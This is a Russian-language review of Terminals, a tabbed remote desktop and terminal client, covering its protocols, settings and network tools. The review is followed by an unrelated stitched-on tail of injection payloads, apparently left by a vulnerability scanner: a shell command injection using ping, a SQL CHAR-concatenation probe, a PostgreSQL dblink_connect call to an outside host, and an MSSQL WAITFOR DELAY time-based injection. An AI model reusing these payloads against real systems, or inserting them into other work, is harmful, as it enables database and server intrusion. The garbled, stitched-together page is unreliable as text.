Terminals представляет собой мощную безопасную службу терминалов, а также удобный клиент удаленного рабочего стола. Проще говоря, Terminals – это сетевое приложение, позволяющее подключаться к нескольким удаленным системам посредством протоколов RDP, VNC, SSH, Telnet, ICA, РАН, HTTP и HTTPS. Управление данными соединениями может осуществлять одновременно.
Программу необходимо запускать от имени администратора (она не будет корректно работать по-другому). Сразу после старта Terminals, в программе довольно просто разобраться. Изначально потребуется создать перечень соединений и добавить их в Favorites Sidebar (Избранное). Двойной клик на любом из созданных соединений откроет его в новой вкладке. Утилита осуществляет фиксацию всех действий пользователя и заносит данные в History Pane, поэтому можно не переживать, что введенные настройки пропадут.
Главным достоинством Terminals является функционал программы. Например, утилита позволяет устанавливать размер экрана RDP, регулировать цвета, перенаправление звука, «горячие» клавиши и подобное. Соединения можно сортировать по группам, а также пользователь способен создавать сценарии соединений для настройки среды.
Программа также предлагает качественный набор сетевых инструментов. Клик правой кнопкой мыши на одном из соединений позволит познакомиться с дополнительным меню сетевых инструментов, которые включают в себя Ping, Tracert, DNS Tool, Port scanner и многое другое.
Terminals отличается многовкладочностью и функциональностью. К сожалению, русскоязычной поддержки нет, поэтому рекомендуем использовать данный инструмент только пользователям с базовыми знаниями английского. Для эффективной работы используется Services ActiveX Client. Скачать Terminals предлагается посредством нашего ресурса.
[left][/left][center][/center][right][/right][hide][/hide]'& ping -n 25 127.0.0.1 &
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(10
1),CHAR(109),CHAR(109),CHAR(97)))
dblink_connect('host=dyr3ifv6raggxfblf0m5efdybvgzthjrzi3bqde-'||'
fii.r87.me user=a password=a connect_timeout=2')
') WAITFOR DELAY '0:0:25'-- /* 850c381c-a338-4870-bf3f-83bb4afef007 */